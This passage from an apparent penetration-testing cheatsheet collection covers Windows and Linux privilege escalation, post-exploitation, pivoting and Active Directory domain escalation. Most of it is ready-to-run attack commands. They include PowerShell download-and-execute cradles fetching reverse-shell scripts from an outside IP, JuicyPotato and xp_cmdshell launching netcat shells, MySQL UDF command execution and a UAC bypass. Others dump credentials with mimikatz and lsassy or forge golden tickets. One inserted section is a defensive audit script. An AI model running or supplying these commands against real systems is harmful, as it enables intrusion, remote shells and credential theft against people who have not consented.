Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser"
Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"
Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};"
```

> For more details, see the next cheatsheet : [Domain Escalation](08-domain-escalation.md)

### Juicy Potato

**abusing the golden privileges**

- [Juicy Potato releases](https://github.com/ohpe/juicy-potato/releases)

> Juicy Potato doesn't work on Windows Server 2019 and Windows 10 1809+.

Check the privileges of the service account: look for SeImpersonate and/or SeAssignPrimaryToken (Impersonate a client after authentication).

```bat
whoami /priv
```

Select a CLSID based on your Windows version; a CLSID is a globally unique identifier that identifies a COM class object. Versions covered :

- Windows 7 Enterprise
- Windows 8.1 Enterprise
- Windows 10 Enterprise
- Windows 10 Professional
- Windows Server 2008 R2 Enterprise
- Windows Server 2012 Datacenter
- Windows Server 2016 Standard

Execute JuicyPotato to run a privileged command.

```bat
JuicyPotato.exe -l 9999 -p c:\interpub\wwwroot\upload\nc.exe -a "IP PORT -e cmd.exe" -t t -c {B91D5831-B1BD-4608-8198-D72E155020F7}
JuicyPotato.exe -l 1340 -p C:\users\User\rev.bat -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
JuicyPotato.exe -l 1337 -p c:\Windows\System32\cmd.exe -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} -a "/c c:\users\User\reverse_shell.exe"
Testing {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} 1337
......
[+] authresult 0
{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
```

### tscon

When you are local administrator, run `psexec -s -i cmd` to get a shell as NT AUTHORITY\SYSTEM.

Then run `query user` to list the connected users (with their session id); you can then take over the RDP session of a user : `cmd /k tscon /dest:console`

---

## **DLL hijacking**

Tools

- find missing dll : [Process Monitor](https://technet.microsoft.com/en-us/sysinternals/processmonitor.aspx)
- PowerSploit : `Find-ProcessDLLHijack`, `Find-PathDLLHijack`, `Write-HijackDll`
- msf : `exploit/windows/local/ikeext_service`

Search order used to locate a missing dll :

1. The directory from which the application is loaded
2. C:\Windows\System32
3. C:\Windows\System
4. C:\Windows
5. The current working directory
6. Directories in the system PATH environment variable
7. Directories in the user PATH environment variable

Check the ACL of a directory on that path :

```bat
icacls C:\Perl64
```

---

## **Vulnerable Drivers**

- [DriverQuery](https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery)

```bat
driverquery
driverquery.exe /fo table
DriverQuery.exe --no-msft
```

---

## **Named Pipes**

Tools

- SeatBelt.exe

Manual

- Find named pipes : `[System.IO.Directory]::GetFiles("\\.\pipe\")`
- Check named pipes DACL : `pipesec.exe`
- Reverse engineer the software
- Send data through the named pipe : `program.exe >\\.\pipe\StdOutPipe 2>\\.\pipe\StdErrPipe`

## **UAC Bypass**

```sh
# https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1
Invoke-EventVwrBypass -Command "powershell.exe "
Invoke-EventVwrBypass -Command "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "
powershell.exe -ExecutionPolicy Bypass -c Import-Module -Name C:\Windows\temp\Invoke-EventVwrBypass.ps1;Invoke-EventVwrBypass -Command "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -enc IgBJAHMAIABFAGwAZQB2AGEAdABlAGQAOgAgACQAKAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAnAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAJwApACkAIAAtACAAJAAoAEcAZQB0AC0ARABhAHQAZQApACIAIAB8ACAATwB1AHQALQBGAGkAbABlACAAQwA6AFwAVQBBAEMAQgB5AHAAYQBzAHMAVABlAHMAdAAuAHQAeAB0ACAALQBBAHAAcABlAG4AZAA="

# https://github.com/hfiref0x/UACME
msbuild "c:\projects\uacme\Source\uacme.sln" /verbosity:normal /logger:"C:\Program Files\AppVeyor\BuildAgent\Appveyor.MSBuildLogger.dll"
```

---

## **Refs**

- [https://book.hacktricks.xyz/windows/windows-local-privilege-escalation](https://book.hacktricks.xyz/windows/windows-local-privilege-escalation)
- [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Windows - Privilege Escalation.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md)

---

## **To check**

- Invoke-WCMDump -- Extracts credentials from Credential Manager. Detected.
- DomainPasswordSpray -- Spray gathered passwords across the domain
- Inveigh -- PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer and man-in-the-middle tool.
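For a host review, the two checks above (service-account privileges under Juicy Potato, and the DLL search order under DLL hijacking) can be scripted so an administrator can see at a glance which accounts still hold impersonation privileges and which search-path directories low-privileged principals can write to. The script below is an added example written for this edit; it is not part of this cheatsheet or of any tool it links. It assumes an elevated PowerShell 5.1+ session on the host being reviewed, English well-known principal names, and explicit (non-generic) rights in the ACEs; any path it walks comes from the host's own environment.

```powershell
# Added audit example (not from this cheatsheet or any linked tool).
# Assumptions: elevated PowerShell 5.1+ on the host under review, English
# well-known principal names, explicit (non-generic) rights in the ACEs.

function Get-ImpersonationPrivileges {
    # Parses `whoami /priv` and returns the two privileges the Juicy Potato
    # notes above rely on, with their state, so a reviewer can see whether a
    # service account still holds them and should be stripped of them.
    $ofConcern = @('SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege')
    whoami /priv | ForEach-Object {
        # Columns are separated by runs of two or more spaces.
        $fields = $_.Trim() -split '\s{2,}'
        if ($ofConcern -contains $fields[0]) {
            [PSCustomObject]@{ Privilege = $fields[0]; State = $fields[-1] }
        }
    }
}

function Get-WritableSearchPathDirs {
    # Walks the same directories as the DLL search order listed above
    # (minus the application directory, which depends on the binary) and
    # reports Allow ACEs that let low-privileged principals write there.
    $weakPrincipals = @('Everyone', 'BUILTIN\Users',
                        'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
    $writeMask = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Modify, FullControl'

    $dirs = @("$env:SystemRoot\System32", "$env:SystemRoot\System", $env:SystemRoot, (Get-Location).Path)
    $dirs += @($env:Path -split ';' | Where-Object { $_ -and (Test-Path -LiteralPath $_) })

    foreach ($dir in ($dirs | Select-Object -Unique)) {
        $acl = Get-Acl -LiteralPath $dir
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($weakPrincipals -notcontains $ace.IdentityReference.Value) { continue }
            # Generic rights show up as raw integers and do not match the mask;
            # anything that does match is an explicit write-capable grant.
            if (($ace.FileSystemRights -band $writeMask) -ne 0) {
                [PSCustomObject]@{
                    Directory = $dir
                    Principal = $ace.IdentityReference.Value
                    Rights    = $ace.FileSystemRights
                }
            }
        }
    }
}

Get-ImpersonationPrivileges | Format-Table -AutoSize
Get-WritableSearchPathDirs  | Format-Table -AutoSize
```

An empty second table is the expected result on a hardened host; each row it does print is a directory that belongs on the remediation list (tighten the ACL or remove the entry from PATH), and the first table tells you whether the reviewed account is one of those the Juicy Potato note applies to.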

-------------------------------------------------------------------------------- /Cheatsheets/internal/04-lpe-linux.md: --------------------------------------------------------------------------------

# Priv-Esc Linux

## **Tools**

- [lse.sh](https://github.com/diego-treitos/linux-smart-enumeration)
- [LinEnum](https://github.com/rebootuser/LinEnum)

---

## **Kernel Exploitation**

### Check version

```bash
uname -a
cat /etc/*release
cat /etc/issue
```

### Check exploit

```bash
# -E is needed for the alternation to work
searchsploit linux kernel | grep -v dos | grep | grep -iE 'root|privilege|exploit'
```

---

## **Programs running**

```bash
ps -aux | grep root
# https://github.com/DominicBreuker/pspy
```

---

## **Services listening**

```bash
netstat -latupen | grep LISTEN
netstat -nlt | awk -F : '/\/ {split($2,a," "); print a[1]}' | xargs -I % bash -c 'echo -ne "\033[1;33m[+]\033[m Port %:\t$(timeout 1 cat /dev/null \; find / -perm -g=s -o -perm -u=s -type f 2>/dev/null
```

---

## **Docker**

```bash
# we look for docker.sock
find / -group docker -exec ls -la {} 2>/dev/null \;
```

---

## **Systemd**

```bash
echo -e '#!/bin/bash\nchmod 4755 /bin/dash' > /tmp/priv.sh
vi /lib/systemd/system/debug.service
# set the ExecStart= line of the unit to /tmp/priv.sh
reboot
```

## **MySQL**

Privilege escalation for mysql running as root with the mysql root account

- [mysqludf_msf](https://github.com/rapid7/metasploit-framework/tree/master/data/exploits/mysql)

```sql
-- Find plugin directory
SHOW VARIABLES LIKE 'plugin_dir';
select @@plugin_dir;

-- Local method
use mysql;
create table tranilment(line blob);
insert into tranilment values(load_file('/tmp/lib_mysqludf_sys_64.so'));
select * from tranilment into dumpfile '//lib_mysqludf_sys_64.so';
create function sys_exec returns integer soname 'lib_mysqludf_sys_64.so';
select sys_exec('nc 1234 -e /bin/bash');

-- Remote method
select "////SAHRENAME/lib_mysqludf_sys_64.so" into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys_64.so';
create function sys_exec returns integer soname 'lib_mysqludf_sys_64.so';
select sys_exec('nc 1234 -e /bin/bash');
```

---

## **Debian-ssh**

- [https://github.com/g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh)

```bash
git clone https://github.com/g0tmi1k/debian-ssh.git
cd debian-ssh/our_tools/
tar xvjf ubunturoot.tar.bz2

cp dokeygen.sh
chroot ubunturoot /dokeygen.sh 1 -t dsa -b 1024 -f /tmp/dsa_1024_1

ssh-keygen -l -E md5 -f ~/.ssh/id_rsa.

# add "PubkeyAcceptedKeyTypes +ssh-dss" into the client ssh conf
# ssh -vvvvvvvvvvvvvvvvvvvvv helps to understand !
```

-------------------------------------------------------------------------------- /Cheatsheets/internal/05-post-exploitation-windows.md: --------------------------------------------------------------------------------

# Post-Ex Windows

## **Dump secrets**

### LSA

```bash
crackmapexec smb perim_up.txt -u '' -d '' -p '' --lsa
```

### SAM

```bash
crackmapexec smb -u -d -H --sam

reg save hklm\sam .\sam
reg save hklm\system .\system
reg save hklm\security .\security
impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL
```

### LSASS

```bash
crackmapexec smb -u -d -H -M lsassy

lsassy -d '.' -u 'Administrateur' -H ''
lsassy -d -u -p

./spraykatz.py -u -p -t

pypykatz lsa minidump lsass.dmp

procdump.exe -accepteula -ma lsass c:\WINDOWS\Temp\lsass.txt

.\mimikatz.exe "log" "privilege::debug" "sekurlsa::logonpasswords" exit
```

### Kerberos

```bash
.\mimikatz.exe "log" "privilege::debug" "kerberos::list /export" exit
```

### Browser secrets

```bash
sharpchrome.exe

# https://github.com/login-securite/DonPAPI
DonPAPI.py "$DOMAIN"/"$USER":"$PASSWORD"@"$TARGET"
```

## Create/add new local admin account

```bash
net user add
net localgroup "Administrators" /add
```

## Enable WinRM

```bash
Enable-PSRemoting -SkipNetworkProfileCheck -Force
```

## Enable RDP

```bash
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0
```

Add the user to the RDP group

```bash
net localgroup "Remote Desktop Users" /add
```

## Create service

```bash
New-Service -BinaryPathName C:\Users\sqlServer\Documents\system2.exe -Name syshell -DisplayName syshell -StartupType Automatic
Start-Service syshell
```

or (note the mandatory space after `binpath=`)

```
sc \\127.0.0.1 create ServiceName binpath= C:\windows\system32\calc.exe
```

> `\\192.168.1.2` is optional

To check that the service works, you can reboot like this:

`wmic /node:192.168.1.2 os get buildnumber` then

`wmic /node:192.168.1.2 os where buildnumber="" call reboot`

## Execute binary using WMIC

```
wmic /node:127.0.0.1 process call create "C:\windows\system32\calc.exe"
```

> /node is optional

## Stop process

Run this to get the process id (`queryex` includes the PID, `query` does not) : `sc \\127.0.0.1 queryex ServiceName`

then : `wmic /node:127.0.0.1 process where processid= call terminate`

> /node is optional

and then `taskkill /S 127.0.0.1 /PID /f`

> /S is optional

## Create Scheduled tasks

```
schtasks /create /S 192.156.1.2 /tn /sc once /sd 01/01/1910 /ru system /tr "C:\windows\system32\calc.exe"

Other

schtasks /create /S 127.0.0.1 /tn OBLIGE /tr "C:\windows\system32\calc.exe" /sc once /ST 18:30
```

> /ru and /S are optional
> To check that the task has been created, run `schtasks /s 192.156.1.2 /query /tn `

## COM hijack

```bash
schtasks /query /xml > tasks.xml
reg query "HKCR\CLSID\{}\Inprocserver32"
reg query "HKCU\software\classes\CLSID\{}\Inprocserver32"
reg query "HKLM\software\classes\CLSID\{}\Inprocserver32"
reg export "HKLM\software\classes\CLSID\{}\Inprocserver32" export.reg

# Change to HKCU and change dll
reg import export.reg /reg:64
reg query "HKCR\CLSID\{}\Inprocserver32"
reg query "HKCU\software\classes\CLSID\{}\Inprocserver32"
```

## Disconnect User

`rwinsta /server:192.168.1.2 `

> to get the sessionId, run `qwinsta`

## Detection of the antivirus (AV)

Run `fltmc` to get the list of filter altitudes, and look them up in the Windows documentation : https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/allocated-altitudes

For example `389040 = SentinelOne`

The AV range is : 320000 - 329998

It's also possible to identify the AV from the process list, for example :

```
Microsoft Defender MSMpEng.exe
Trend Micro TMBMSRV.exe
Avira avguard.exe/Avira.ServiceHost.exe
Bitdefender bdagent.exe/vsserv.exe
Kaspersky avp.exe/ksde.exe
AVG AVGSvc.exe
Norton NortonSecurity.exe
McAfee MCAPExe.exe/mfemms.exe
Panda PavPrSvr.exe
Avast afwServ.exe/AvastSvc.exe
```

-------------------------------------------------------------------------------- /Cheatsheets/internal/06-post-exploitation-linux.md: --------------------------------------------------------------------------------

# Post-Ex Linux

## **Hash dump**

```bash
sudo xxd /etc/shadow | xxd -r
```

---

## **Strace root**

```bash
sudo strace -o /dev/null /bin/sh
```

-------------------------------------------------------------------------------- /Cheatsheets/internal/07-pivoting.md: --------------------------------------------------------------------------------

# Pivoting

### Single reverse port forwarding

```bash
plink.exe -l root -pw password -R 445:127.0.0.1:445
# ssh has no -pw option: the password is prompted (or use sshpass)
ssh -l root -R 445:127.0.0.1:445
```

### Single Local port forwarding

```bash
ssh -l root -L 445:127.0.0.1:445
```

### Dynamic port forwarding

Socks proxy (socks5)

```bash
ssh -l root -D 1234

# Reverse dynamic
ssh -R 1234
```

Double SSH tunnel

```bash
ssh <1st_target> -L 2222:<2nd_target>:22
ssh localhost -p 2222 -D 1234
```

### Proxychains

```bash
# Choose any tool to create a socks proxy
ssh -D 1234

# Configure proxychains.conf with the protocol and port you chose for the socks proxy
sudo vim /etc/proxychains.conf
quiet_mode # enable this
socks5 127.0.0.1 1234 # change this

# Use any tool by prepending the proxychains command :
proxychains wpscan --url
wpscan --url --proxy socks5://127.0.0.1:1234 --force

# For nmap, you need to specify the -Pn and -sT arguments
proxychains nmap -sT -Pn
```

> You can also forward a single port to avoid using a socks proxy, or use sshuttle

### SSHuttle

Transparent proxy over ssh

```sh
# sudo apt-get update && sudo apt-get install sshuttle
sshuttle -r :22 /24
```

---

### Meterpreter

```sh
# Socks Proxy
run autoroute -s /24
use auxiliary/server/socks4a
exploit -j

# Port forward
portfwd add -l 3389 -p 3389 -r
```

### Plink

```sh
plink.exe -l root -pw password -R 445:127.0.0.1:445 [-P ]
```

### [Chisel](https://github.com/jpillora/chisel)

Socks proxy over SSH for Windows

```sh
git clone https://github.com/jpillora/chisel && cd chisel && go build && go build -ldflags="-s -w" && upx chisel && chmod +x chisel
./chisel client :10000 R:4506:127.0.0.1:4506
chisel server -p 10000 --reverse
```

### Socat

```sh
curl -sL http://:1234/socat -o /tmp/socat && chmod +x /tmp/socat && cd /tmp

# remote forward : redirect all traffic coming from TCP 4506 to the remote host
socat TCP-LISTEN:4506,reuseaddr,reuseport,fork,bind= TCP::4506

# localhost forward : redirect all traffic coming from TCP 80 to TCP 5000
socat TCP-LISTEN:80,fork TCP:127.0.0.1:5000
```

### Netcat

```sh
nc -v -lk -p 8001 -e /usr/bin/nc 127.0.0.1 8000
nc.traditional -l -p 8001 -c "nc 127.0.0.1 8000"
```

### [ReGeorg](https://github.com/sensepost/reGeorg)

Socks proxy over web

## Scan

[PortqryUI](https://www.microsoft.com/en-us/download/details.aspx?id=24009)

```sh
. .\Invoke-Portscan.ps1
Invoke-Portscan -Hosts ,
```

-------------------------------------------------------------------------------- /Cheatsheets/internal/08-domain-escalation.md: --------------------------------------------------------------------------------

# Domain escalation

## **Domain enum**

### GUI enumeration

- [RSAT](https://download.microsoft.com/download/1/D/8/1D8B5022-5477-4B9A-8104-6A71FF9D98AB/WindowsTH-RSAT_WS_1709-x64.msu)

> After installing RSAT, you can go to "Users and Computers AD => View => Advanced"

### Full enumeration

- [Bloodhound](https://github.com/BloodHoundAD/BloodHound) & [Sharphound ingestor](https://github.com/BloodHoundAD/SharpHound3) or [bloodhound-python ingestor](https://github.com/fox-it/BloodHound.py)
- [Ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump)
- [windapsearch](https://github.com/ropnop/windapsearch)
- [https://github.com/PowerShellMafia/PowerSploit](https://github.com/PowerShellMafia/PowerSploit)
- [PowerView 2.0 Cheatsheet](https://gist.github.com/HarmJ0y/3328d954607d71362e3c)

```bash
# Install full bloodhound
sudo apt-get update && sudo apt-get install -y bloodhound python3-pip && pip3 install bloodhound
# bloodhound-python
bloodhound-python -d -p -dc -c All
# Custom queries
# https://github.com/hausec/Bloodhound-Custom-Queries

# ldapdomaindump install
pip install ldapdomaindump
# ldapdomaindump usage
ldapdomaindump -u '\' -p ''

# windapsearch install
git clone https://github.com/ropnop/windapsearch.git && pip install python-ldap && cd windapsearch
# windapsearch usage
./windapsearch.py -d -u -p '' --da -o
./windapsearch.py -d -u -p '' --full -o

# ldapsearch
sudo ldapsearch -x -LLL -H ldap://webmail..fr -D "cn=" -b "dc=,dc=" -w ''

enum4linux -a
```

### Find domain name

```bash
cat /etc/resolv.

Get-NetDomain
Get-DomainSID

nmap -sT -vvv --open -T2 -sC --script=*-ntlm-info -sV -p 110,995,143,993,3389,23,25,465,587,119,433,563,1433,80,8080,443,8443
```

### Users enumeration

Domain users and password policy (especially complexity and lockout threshold for bruteforce)

```bash
net user /domain

enum4linux |grep "user:" | cut -d '[' -f2 | cut -d "]" -f1 > users.txt

$Searcher = New-Object DirectoryServices.DirectorySearcher
$Searcher.Filter = "(&(objectclass=user))"
$Searcher.SearchRoot = ''
$Searcher.FindAll()

Get-NetUser | select samaccountname
```

### Users with SPN

```bash
$Searcher = New-Object DirectoryServices.DirectorySearcher
$Searcher.Filter = "(&(!(samaccountname=krbtgt))(objectclass=user)(objectcategory=user)(servicePrincipalName=*))"
$Searcher.SearchRoot = ''
$Searcher.FindAll()

Get-NetUser -SPN | select samaccountname,serviceprincipalname
```

### Policy enumeration

Domain users and password policy (especially complexity and lockout threshold for bruteforce)

```bash
net accounts /domain

enum4linux -P -o

(Get-DomainPolicy)."kerberos policy"
```

### Computers enumeration

Find DC IP

```bash
cat /etc/resolv.conf

nslookup

$Searcher = New-Object DirectoryServices.DirectorySearcher ; $Searcher.Filter = "(&(objectclass=computer))" ; $Searcher.SearchRoot = '' ; $Searcher.FindAll()

Get-NetDomainController
```

Domain computers

- [adidnsdump](https://github.com/dirkjanm/adidnsdump)
- [SharpSniper](https://github.com/HunnicCyber/SharpSniper)

```bash
netdom query SERVER

Get-ADComputer -Filter * -Property * | Select-Object Name,OperatingSystem,OperatingSystemVersion,ipv4Address | Export-CSV ADcomputerslist.csv -NoTypeInformation -Encoding UTF8

# pip install git+https://github.com/dirkjanm/adidnsdump#egg=adidnsdump
adidnsdump -u \\ -p
adidnsdump -u \\ -p --forest --include-tombstoned
adidnsdump -u \\ -p --dns-tcp

# Find the specific computer of a domain user
SharpSniper.exe emusk

# Find computers where the current user is local admin
Find-WMILocalAdminAccess

# Find computers where the current user can get a shell
Get-NetComputer -Unconstrained

# One-line powershell reverse lookup
for ($i=1; $i -le 254; $i++) { $a=Get-Random -Maximum 4; echo "10.11.12.$i"; $ErrorActionPreference = "SilentlyContinue"; [System.Net.DNS]::GetHostbyAddress("10.11.12.$i").HostName; $ErrorActionPreference = "Continue"; sleep $a }
```

### Shares enumeration

Look for anonymous SMB, NFS, FTP, etc.

**SMB readable shares**

```bash
# ManSpider
git clone https://github.com/blacklanternsecurity/MANSPIDER && cd MANSPIDER && pipenv --python 3 shell
pip install -r requirements.txt
./manspider.py -d -u -p -f passw user admin account network login logon cred
./manspider.py -d -u -p -c password -e xlsx
./manspider.py -d -u -p -e bat com vbs ps1 psd1 psm1 pem key rsa pub reg txt cfg conf config

# smbmap
smbmap -H IP -r DOSSIER
smbmap -H IP --download DOSSIER
smbmap -P 445 -H -u '' -p ''
smbmap --host-file smb-hosts.txt -u '' -p '' -q -R --depth 3 --exclude ADMIN$ IPC$ -A '(web|server|global|index|login|logout|auth|httpd|config).(xml|config|conf|asax|aspx|php|asp|jsp|html)'

# smbget & smbclient
smbget -rR smb://// -U
smbclient \\\\\\c$ -U
smbclient -L // -U '\'

# SMB V1
smbclient -L ///192.168.0.1 -U -c ls [--option='client min protocol=NT1']
mount //10.11.1.136/"Bob Share" /mnt/bob [-o vers=1.0]

# wireshark filter to find the SMB version
smb.native_lanman
```

**SMB writable shares**

Upload this @scf_filename.scf and listen for hashes using Responder/NTLMrelayx

> adding a @ as the first letter of the filename places the .scf file at the top of the shared folder

```ini
[Shell]
Command=2
IconFile=\\\share\.ico
[Taskbar]
Command=ToggleDesktop
```

**NFS**

```bash
showmount -e
mount :/home/xx /mnt/yy
```

### Forest enumeration

```bash
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()

Get-NetForest
Get-NetForestCatalog
Get-NetForestTrust
```

---

## **ACLs**

### GenericAll on user "alfred" from "jenaye" (Bloodhound)

It's possible to use certipy like this `certipy shadow auto -username jenaye@ -p 'AAAAA' -account alfred` to get the hash of user alfred, but you can also do it manually :

`proxychains python3 pywhisker.py -d -u jenaye -p 'AAAAA' --target alfred --action "add" --dc-ip --filename alfred.pfx`

then

`proxychains python3 gettgtpkinit.py -cert-pfx "alfred.pfx" -pfx-pass "" "/alfred" "alfred.ccache"`

and get the NT hash of alfred :

`KRB5CCNAME=alfred.ccache proxychains python3 getnthash.py /alfred -key `

> It's also possible to do this on a machine account ( --target 'ComputerXXX$')

### ACLPwn

- [aclpwn.py](https://github.com/fox-it/aclpwn.py)
- [Invoke-ACLPwn](https://github.com/fox-it/Invoke-ACLPwn)

```bash
# pip install aclpwn
python aclpwn.py -f -ft user -d -dry
python aclpwn.py -f -ft computer -d -dry
python aclpwn.py -f -ft user -d
python aclpwn.py -f -ft user -d --restore aclpwn-20181129-182321.restore

# Powershell
./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -NoDCSync
./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe
./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -userAccountToPwn 'Administrator'
./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -LogToFile
./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -NoSecCleanup
./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -Username -Domain -Password
```

### Manual Exploit DCSync

```bash
# Get ACL
Get-DomainObjectAcl -Identity -ResolveGUIDs | ? { $_.SecurityIdentifier -Match $(ConvertTo-SID ) }

# Add DCSync
Add-DomainObjectAcl -TargetIdentity "DC=,DC=" -PrincipalIdentity -Rights DCSync

# Dump ntds
meterpreter > dcsync_ntlm \
```

---

## **Kerberos Tokens**

### Tools

- [Rubeus.exe](https://github.com/GhostPack/Rubeus) (DOTNET CSHARP)
- [Tokenvator](https://github.com/0xbadjuju/Tokenvator) (DOTNET CSHARP)
- [Incognito.exe](https://github.com/FSecureLABS/incognito) (Meterpreter extension)
- [TokenManipulation.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/c7985c9bc31e92bb6243c177d7d1d7e68b6f1816/Exfiltration/Invoke-TokenManipulation.ps1)
- [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec)

Reflectively load a DOTNET CSHARP assembly within Powershell (or Cobalt, SilentTrinity etc.) if you can't do it through your C2 infra :

```powershell
$wc=New-Object System.Net.WebClient;$wc.Headers.Add("User-Agent","Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0");$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials
$k="xxxxxxx";$i=0;[byte[]]$b=([byte[]]($wc.DownloadData("https://xxxxx")))|%{$_-bxor$k[$i++%$k.length]}
[System.Reflection.Assembly]::Load($b) | Out-Null
$parameters=@("arg1", "arg2")
[namespace.Class]::Main($parameters)
```

### Kerberos Dump

```bash
# List SPN
impacket GetUserSPNs.py

# Create a new service ticket in memory
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "SSQLSvc/xor-app23.xor.com:1433"

# Mimikatz
.\mimikatz.exe "log" "privilege::debug" "kerberos::list /export" exit
Invoke-Mimikatz -Command '"kerberos::list /export"'

# Rubeus
Rubeus.exe klist
Rubeus.exe dump
Rubeus.exe monitor /interval:5 /nowrap ; MS-RPRN.exe \\ \\ ; Rubeus.exe ptt /ticket: ; Invoke-Mimikatz -Command '"lsadump::dcsync /user:\krbtgt"' ; Enter-PSSession -ComputerName
```

---

### Kerberos pre-auth

```bash
Rubeus.exe asreproast /outfile:asrep_hashes.txt

nmap -p88 --script=krb5-enum-users --script-args krb5-enum-users.realm='',userdb=/root/users.txt

./kerbrute_linux_amd64 userenum -d usernames.txt -debug

impacket-GetNPUsers -usersfile kerb_users.txt / -dc-ip
```

---

### Kerberoast attack

```bash
Rubeus.exe kerberoast /outfile:roasted_hashes.txt
```

---

### Kerberos impersonate

Find domain admin accounts

```bash
net group "Domain Admins" /DOMAIN

Get-NetGroupMember -GroupName "Domain Admins" -Recurse
```

Find whether one is logged on somewhere :

```bash
crackmapexec smb -u -d -H --loggedon-users
bloodhound-python -d -p -dc -c LoggedOn
```

Impersonate kerberos token

```bash
# Rubeus
Rubeus.exe s4u

# TokenManipulation
Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser"
Get-Process wininit | Invoke-TokenManipulation -CreateProcess "cmd.exe"

# Incognito loaded by Meterpreter
load incognito
list_tokens -u
impersonate_token \\ # Double slash is mandatory !

# Incognito standalone executable
Incognito.exe

# CrackMapExec using kerberos ticket
export KRB5CCNAME=.ccache
sudo cme smb --kerberos -x whoami
```

Check if a computer has the TrustedForDelegation flag enabled

```bash
Get-ADComputer -Identity -Properties TrustedForDelegation
```

Create new Domain Admin account

```bash
net user add /domain
net group "Domain Admins" /add
```

### Golden Ticket

```bash
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain: /sid: /sids: /krbtgt: /ticket:krbtgt.kirbi"'
Invoke-Mimikatz -Command '"kerberos::ptt krbtgt.kirbi"'
ls \\\C$

Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
Invoke-Mimikatz -Command '"lsadump::dcsync /domain: /all"'
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain: /sid:S-1-5-21-77175520-687805270-358672322 /sids:S-1-5-21-1458491649-1432147247-1990877046-519 /krbtgt:1ee3a9c4a96c4450878eaa8cb45b29fb /ptt"'
gwmi -class win32_operatingsystem -ComputerName
```

---

### Manual testing

- [secureauth.com](https://www.secureauth.com/blog/kerberos-delegation-spns-and-more/)

### Delegation Explained

- [specterops.io](https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1)

## **SQL exploit**

Trusted Links (pwn even across forest trusts)

```bash
# dot-source the script so its functions are available in the current session
. .\PowerUpSQL.ps1
Get-SQLInstanceLocal
Get-SQLInstanceDomain
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded

Get-SQLServerLink -Verbose -Instance
Get-SQLServerLinkCrawl -Verbose -Instance
Get-SQLServerLinkCrawl -Verbose -Instance -Query 'exec master..xp_cmdshell "whoami"'
Get-SQLServerLinkCrawl -verbose -Instance -Query 'EXECUTE(''sp_configure ''''xp_cmdshell'''',1;reconfigure;'') AT ""'
Get-SQLServerLinkCrawl -Instance -Query 'exec master..xp_cmdshell "powershell iex (New-Object Net.WebClient).DownloadFile(''http:///nc.exe'',''C:\Windows\Temp\nc.exe'')"' ; Get-SQLServerLinkCrawl -Instance -Query 'exec master..xp_cmdshell "C:\Windows\Temp\nc.exe -e cmd 1234"'

